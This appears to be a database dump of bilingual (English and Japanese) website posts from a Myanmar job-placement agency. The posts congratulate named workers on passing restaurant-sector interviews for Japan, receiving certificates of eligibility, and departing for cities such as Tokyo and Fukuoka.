('activities', 0, 73, 439, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations for&nbsp;</p><ol><li>KHIN KHIN KYAW</li><li>THET MYAT MYAT KHAING</li><li>WIN PYAE SHAN</li><li>HNIN THAZIN AUNG</li><li>YU YA NWAY</li></ol><p>For Departing to JAPAN, TOKYO with Tokueti Gaishoku (Restaurant) Job!&nbsp;</p><p>Have A safe Flight !&nbsp;</p><img><img data-entity-uuid=\"251d0d0b-e02b-4f4e-b008-c88aa598687e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_2.jpg\"><img data-entity-uuid=\"15767dc3-645d-4974-a641-d572f32a108f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_1.jpg\"><img data-entity-uuid=\"8bbf0b1b-586f-4a0c-93ee-d30e55e4a5bb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/55_1.jpg\">', '', 'full_html'),
('activities', 0, 73, 439, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>おめでとうございます。</p><ol><li>KHIN KHIN KYAW</li><li>THET MYAT MYAT KHAING</li><li>WIN PYAE SHAN</li><li>HNIN THAZIN AUNG</li><li>YU YA NWAY</li></ol><p>特恵外食（レストラン）の仕事のため、東京へ出発！</p><p>安全な旅を祈ります！</p><p><img><img src=\"/sites/default/files/inline-images/33_2.jpg\" data-entity-uuid=\"251d0d0b-e02b-4f4e-b008-c88aa598687e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_1.jpg\" data-entity-uuid=\"15767dc3-645d-4974-a641-d572f32a108f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/55_1.jpg\" data-entity-uuid=\"8bbf0b1b-586f-4a0c-93ee-d30e55e4a5bb\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 74, 437, 'en', 0, '<p>Congratulations to KYAW NAING in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 74, 438, 'en', 0, '<p>Congratulations to KYAW NAING in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 74, 438, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したKYAW NAINGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 74, 440, 'en', 0, '<blockquote><h2>Congratulations！</h2></blockquote><p>Congratulations to KYAW NAING in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 74, 440, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したKYAW NAINGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 75, 441, 'en', 0, '<p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 442, 'en', 0, '<p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 442, 'ja', 0, '<p>特定外食（レストラン）の面接に合格したCHI SAYAROOさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 75, 443, 'en', 0, '<p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 443, 'ja', 0, '<p>特定外食（レストラン）の面接に合格したCHITT SAYAR OOさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 75, 444, 'en', 0, '<p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 444, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHITT SAYAR OOさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 75, 446, 'en', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 446, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHITT SAYAR OOさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 75, 448, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 448, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHITT SAYAR OOさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 76, 445, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!&nbsp;</strong></p></blockquote><p><strong>Congratulations for NAN SU KHAING &amp; WUT YEE AUNG for departure to JAPAN, NAGASAKI !&nbsp;</strong></p><img data-entity-uuid=\"2b8b4015-d243-4566-8664-b3e6574ae047\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_3.jpg\"><img data-entity-uuid=\"a1c86943-2e50-47aa-83b2-db73ec23321d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_3.jpg\"><img data-entity-uuid=\"0f58c1ec-5fd6-42a6-ace4-6b1669b714e6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_2.jpg\"><img data-entity-uuid=\"876dbb5d-1b69-44a8-b5f1-26eda0c8b7eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/viber_image_2024-06-25_14-12-23-830.jpg\">', '', 'full_html'),
('activities', 0, 76, 447, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!&nbsp;</strong></p></blockquote><p><strong>Congratulations for NAN SU KHAING &amp; WUT YEE AUNG for departure to JAPAN, NAGASAKI !&nbsp;</strong></p><img data-entity-uuid=\"2b8b4015-d243-4566-8664-b3e6574ae047\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_3.jpg\"><img data-entity-uuid=\"a1c86943-2e50-47aa-83b2-db73ec23321d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_3.jpg\"><img data-entity-uuid=\"0f58c1ec-5fd6-42a6-ace4-6b1669b714e6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_2.jpg\"><img data-entity-uuid=\"876dbb5d-1b69-44a8-b5f1-26eda0c8b7eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/viber_image_2024-06-25_14-12-23-830.jpg\">', '', 'full_html'),
('activities', 0, 76, 447, 'ja', 0, '<blockquote><h2>おめでとうございます!</h2></blockquote><p><strong>NAN SU KHAING と WUT YEE AUNG の日本、長崎への出発おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/22_3.jpg\" data-entity-uuid=\"2b8b4015-d243-4566-8664-b3e6574ae047\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33_3.jpg\" data-entity-uuid=\"a1c86943-2e50-47aa-83b2-db73ec23321d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_2.jpg\" data-entity-uuid=\"0f58c1ec-5fd6-42a6-ace4-6b1669b714e6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/viber_image_2024-06-25_14-12-23-830.jpg\" data-entity-uuid=\"876dbb5d-1b69-44a8-b5f1-26eda0c8b7eb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 77, 449, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!</strong></p></blockquote><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>25-6-2024 While accompanying 3 workers who will go to work at a large restaurant in Tokyo, Japan.&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN !</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Take care of your health&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Strictly follow working hours</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>&nbsp;-Treat work as if it were your own work and work hard to do it&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Learn to understand Japanese culture</strong></span></p><img data-entity-uuid=\"3a6b8a5f-2bdf-4db9-94e2-12d30445c28e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_3.jpg\"><img data-entity-uuid=\"53b33498-3201-4e1e-a61c-2be24dca4a65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_4.jpg\"><img data-entity-uuid=\"883fcbe3-231b-464a-ac43-3853c7e963ac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_4.jpg\"><img data-entity-uuid=\"91d3425d-8fa0-4d06-ac23-d00230c03826\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_3.jpg\">', '', 'full_html'),
('activities', 0, 77, 450, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!</strong></p></blockquote><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>25-6-2024 While accompanying 3 workers who will go to work at a large restaurant in Tokyo, Japan.&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN !</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Take care of your health&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Strictly follow working hours</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>&nbsp;-Treat work as if it were your own work and work hard to do it&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Learn to understand Japanese culture</strong></span></p><img data-entity-uuid=\"3a6b8a5f-2bdf-4db9-94e2-12d30445c28e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_3.jpg\"><img data-entity-uuid=\"53b33498-3201-4e1e-a61c-2be24dca4a65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_4.jpg\"><img data-entity-uuid=\"883fcbe3-231b-464a-ac43-3853c7e963ac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_4.jpg\"><img data-entity-uuid=\"91d3425d-8fa0-4d06-ac23-d00230c03826\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_3.jpg\">', '', 'full_html'),
('activities', 0, 77, 450, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>2024年6月25日 東京の大型レストランで働く3人の従業員に同行中。</strong></p><p><strong>AUNG ZIN OO、HNIN EI PHYU、EI SHWE ZIN、おめでとうございます！</strong></p><p><strong>- 健康に気を付けてください</strong></p><p><strong>- 勤務時間を厳守してください</strong></p><p><strong>- 仕事を自分の仕事のように扱い、一生懸命に取り組んでください</strong></p><p><strong>- 日本の文化を理解してください</strong></p><img src=\"/sites/default/files/inline-images/11_3.jpg\" data-entity-uuid=\"3a6b8a5f-2bdf-4db9-94e2-12d30445c28e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/22_4.jpg\" data-entity-uuid=\"53b33498-3201-4e1e-a61c-2be24dca4a65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33_4.jpg\" data-entity-uuid=\"883fcbe3-231b-464a-ac43-3853c7e963ac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_3.jpg\" data-entity-uuid=\"91d3425d-8fa0-4d06-ac23-d00230c03826\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 78, 451, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS !&nbsp;</strong></h2></blockquote><p>Congratulations to NYEIN EI EI SWE &amp; EI EI MON for departure to HOKKAIDO , JAPAN on (13-6-2024).</p><img data-entity-uuid=\"6d0bfd26-10a4-4852-81da-e2f5b0d5799c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1.jpg\"><img data-entity-uuid=\"9076b915-d4f6-4503-b62e-f8cace497a1b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2.jpg\"><img data-entity-uuid=\"66807a01-f460-4c5f-8f12-0dbb3f10b535\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3.jpg\"><img data-entity-uuid=\"badc7488-f822-414d-819c-8ebcbc317ad2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4.jpg\"><img data-entity-uuid=\"27c4a836-59e5-48f3-97fc-ed4aca5b987f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5.jpg\"><img data-entity-uuid=\"3310b4e6-ca01-4cee-bad5-270ec2925b0a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6.jpg\">', '', 'full_html'),
('activities', 0, 78, 452, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS !&nbsp;</strong></h2></blockquote><p>Congratulations to NYEIN EI EI SWE &amp; EI EI MON for departure to HOKKAIDO , JAPAN on (13-6-2024).</p><img data-entity-uuid=\"6d0bfd26-10a4-4852-81da-e2f5b0d5799c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1.jpg\"><img data-entity-uuid=\"9076b915-d4f6-4503-b62e-f8cace497a1b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2.jpg\"><img data-entity-uuid=\"66807a01-f460-4c5f-8f12-0dbb3f10b535\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3.jpg\"><img data-entity-uuid=\"badc7488-f822-414d-819c-8ebcbc317ad2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4.jpg\"><img data-entity-uuid=\"27c4a836-59e5-48f3-97fc-ed4aca5b987f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5.jpg\"><img data-entity-uuid=\"3310b4e6-ca01-4cee-bad5-270ec2925b0a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6.jpg\">', '', 'full_html'),
('activities', 0, 78, 452, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p>NYEIN EI EI SWE と EI EI MON が 2024 年 6 月 13 日に日本の北海道へ出発します。</p><p>おめでとうございます。</p><img src=\"/sites/default/files/inline-images/1.jpg\" data-entity-uuid=\"6d0bfd26-10a4-4852-81da-e2f5b0d5799c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2.jpg\" data-entity-uuid=\"9076b915-d4f6-4503-b62e-f8cace497a1b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3.jpg\" data-entity-uuid=\"66807a01-f460-4c5f-8f12-0dbb3f10b535\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4.jpg\" data-entity-uuid=\"badc7488-f822-414d-819c-8ebcbc317ad2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5.jpg\" data-entity-uuid=\"27c4a836-59e5-48f3-97fc-ed4aca5b987f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6.jpg\" data-entity-uuid=\"3310b4e6-ca01-4cee-bad5-270ec2925b0a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 79, 453, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations to SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA city, JAPAN.&nbsp;</p><img data-entity-uuid=\"00c724d7-71d7-42cc-9718-e7111848ea8c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_0.jpg\"><img data-entity-uuid=\"a8efcca4-8f0f-4cc4-9dab-a0a02d7f7750\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_0.jpg\"><img data-entity-uuid=\"0a670e45-4345-478f-a5a4-4824967e9d87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_0.jpg\"><img data-entity-uuid=\"8ef6d763-6c56-406c-838b-d3dc0dffed8a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_0.jpg\">', '', 'full_html'),
('activities', 0, 80, 454, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS !</strong></p></blockquote><p><strong>On February 5, 2024, two young daughters embarked on their journey to Fukuoka, Japan. Demonstrating dedication to their health and work, they consistently support their parents. We wish them continued success and fulfillment in their roles as exemplary daughters.</strong></p><p><strong>Congratulations to SHIN THANT PHYU &amp; YAMIN THET!&nbsp;</strong></p><img data-entity-uuid=\"dbb32235-5b0d-4f46-84c0-18919db88888\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_1.jpg\"><img data-entity-uuid=\"7dc54b65-9b2a-4680-90ea-dea9bd3895ea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_1.jpg\"><img data-entity-uuid=\"2d8ede65-342c-4697-8dd1-5fd614759804\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_1.jpg\"><img data-entity-uuid=\"2d24a1ac-660e-4859-8d83-c8c4671ac0e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_1.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 80, 455, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS !</strong></p></blockquote><p><strong>On February 5, 2024, two young daughters embarked on their journey to Fukuoka, Japan. Demonstrating dedication to their health and work, they consistently support their parents. We wish them continued success and fulfillment in their roles as exemplary daughters.</strong></p><p><strong>Congratulations to SHIN THANT PHYU &amp; YAMIN THET!&nbsp;</strong></p><img data-entity-uuid=\"dbb32235-5b0d-4f46-84c0-18919db88888\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_1.jpg\"><img data-entity-uuid=\"7dc54b65-9b2a-4680-90ea-dea9bd3895ea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_1.jpg\"><img data-entity-uuid=\"2d8ede65-342c-4697-8dd1-5fd614759804\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_1.jpg\"><img data-entity-uuid=\"2d24a1ac-660e-4859-8d83-c8c4671ac0e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_1.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 80, 455, 'ja', 0, '<blockquote><h2><strong>おめでとうございます!</strong></h2></blockquote><p><strong>2024年2月5日、2人の幼い娘が日本の福岡への旅に出ました。健康と仕事に献身的な姿勢を見せながら、彼女たちは両親を常にサポートしています。模範的な娘としての役割を今後も果たし、成功し続けることをお祈りします。</strong></p><p><strong>SHIN THANT PHYU &amp; YAMIN THET</strong>、<strong>おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/1_1.jpg\" data-entity-uuid=\"dbb32235-5b0d-4f46-84c0-18919db88888\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_1.jpg\" data-entity-uuid=\"7dc54b65-9b2a-4680-90ea-dea9bd3895ea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_1.jpg\" data-entity-uuid=\"2d8ede65-342c-4697-8dd1-5fd614759804\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_1.jpg\" data-entity-uuid=\"2d24a1ac-660e-4859-8d83-c8c4671ac0e1\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 81, 456, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!</strong></p></blockquote><p><strong>Congratulations KAUNG MYAT SOE for passing the Interview for TOKUTEI GAISHOKU (Restaurant) with Excellent Points!!&nbsp;</strong></p><img data-entity-uuid=\"2b18eb1e-6642-4e54-8f81-e7fe33e63559\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAUNG%20MYAT%20SOE.jpg\">', '', 'full_html'),
('activities', 0, 81, 457, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!</strong></p></blockquote><p><strong>Congratulations KAUNG MYAT SOE for passing the Interview for TOKUTEI GAISHOKU (Restaurant) with Excellent Points!!&nbsp;</strong></p><img data-entity-uuid=\"2b18eb1e-6642-4e54-8f81-e7fe33e63559\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAUNG%20MYAT%20SOE.jpg\">', '', 'full_html'),
('activities', 0, 81, 457, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>KAUNG MYAT SOE さん、特選外食 (レストラン) の面接に優秀な成績で合格しました。おめでとうございます!</strong></p><img src=\"/sites/default/files/inline-images/KAUNG%20MYAT%20SOE.jpg\" data-entity-uuid=\"2b18eb1e-6642-4e54-8f81-e7fe33e63559\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 82, 458, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to MYO KHANT in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 82, 459, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to MYO KHANT in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 82, 459, 'ja', 0, '<blockquote><h2>おめでとうございます！!</h2></blockquote><p>特定外食（レストラン）の面接に合格したMYO KHANT さん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 83, 460, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations For getting COE for KHU RICHARD &amp; LI SOUNG OO &nbsp;</p><p><img src=\"/sites/default/files/inline-images/khu%20richard.jpg\" data-entity-uuid=\"61a82c11-5fd4-4581-8495-3784f06a7942\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/li%20soung%20oo.jpg\" data-entity-uuid=\"dd8174ab-bdda-4e0e-b1e2-a70f7b7800b3\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 83, 464, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations For getting COE for KHU RICHARD &amp; LI SOUNG OO &nbsp;</p><p><img src=\"/sites/default/files/inline-images/khu%20richard.jpg\" data-entity-uuid=\"61a82c11-5fd4-4581-8495-3784f06a7942\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/li%20soung%20oo.jpg\" data-entity-uuid=\"dd8174ab-bdda-4e0e-b1e2-a70f7b7800b3\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 83, 464, 'ja', 0, '<p class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\">&nbsp;</p><h2 class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\"><span class=\"Y2IQFc\" lang=\"ja\">おめでとう！</span></h2><pre class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\">&nbsp;</pre><pre class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\"><span class=\"Y2IQFc\" lang=\"ja\">KHU RICHARDさんとLI SOUNG OOさんのCOE取得おめでとうございます\r\n</span></pre><p><br><img src=\"/sites/default/files/inline-images/khu%20richard.jpg\" data-entity-uuid=\"61a82c11-5fd4-4581-8495-3784f06a7942\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/li%20soung%20oo.jpg\" data-entity-uuid=\"dd8174ab-bdda-4e0e-b1e2-a70f7b7800b3\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 84, 461, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to YE MONG AUNG in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 84, 465, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to YE MONG AUNG in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
